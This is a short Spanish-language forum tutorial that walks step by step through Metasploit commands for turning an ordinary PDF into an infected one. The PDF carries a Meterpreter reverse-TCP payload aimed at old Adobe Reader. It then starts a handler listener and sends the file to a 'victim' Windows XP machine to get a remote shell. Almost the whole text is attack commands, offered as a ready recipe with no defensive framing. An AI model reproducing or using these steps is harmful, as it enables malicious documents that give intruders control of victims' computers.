Aún y que esto ya está corregido en versiones posteriores a la 9.x todavía es factible su uso...
Vamos a crear un pdf infectado utilizando nuestro amigo metasploit...
Crearemos una conexión de la víctima a nosotros, aumentando en cierta medida el éxito de este ataque, puesto que conexiones externas suelen ser rechazadas por el firewall...
Abriremos una terminal y tecleamos:
Código:
msfconsole #quizá tengáis que usar sudo msfconsole...
Una vez cargado metasploit:
Código:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Código:
set FILENAME aqqle.pdf
Ahora le indicamos el directorio del fichero PDF original a infectar, en mi caso:
Código:
set INFILENAME /home/bugtraq/Hacking/Manuales/mitm.pdf
Código:
set OUTPUTPATH /home/bugtraq/
Código:
set PAYLOAD windows/meterpreter/reverse_tcp
Código:
set LHOST 192.168.0.199
Código:
set LPORT 4455
Código:
set id 0
Ahora toca hacer el exploit...
Código:
exploit
Dejaremos el exploit de lado para ponernos a la espera de nuestro PAYLOAD. Para ello:
Código:
back
Código:
use exploit/multi/handler
Código:
set PAYLOAD windows/meterpreter/reverse_tcp
Código:
set LHOST 192.168.0.199
Código:
set LPORT 4455
Código:
set id 0
Finalmente...
Código:
exploit
Enviamos nuestro archivo pdf infectado a una víctima, en nuestro caso un Windows XP SP2 y al abrirlo... Se hizo la luz!
Una vez aquí... cada uno que haga lo que quiera, lo suyo seria migrar a explorer etc..
Lo siento Sergi...
Saludos!
. _ ; _ _ . _ ; _ _ . _ ; . _ . . ; .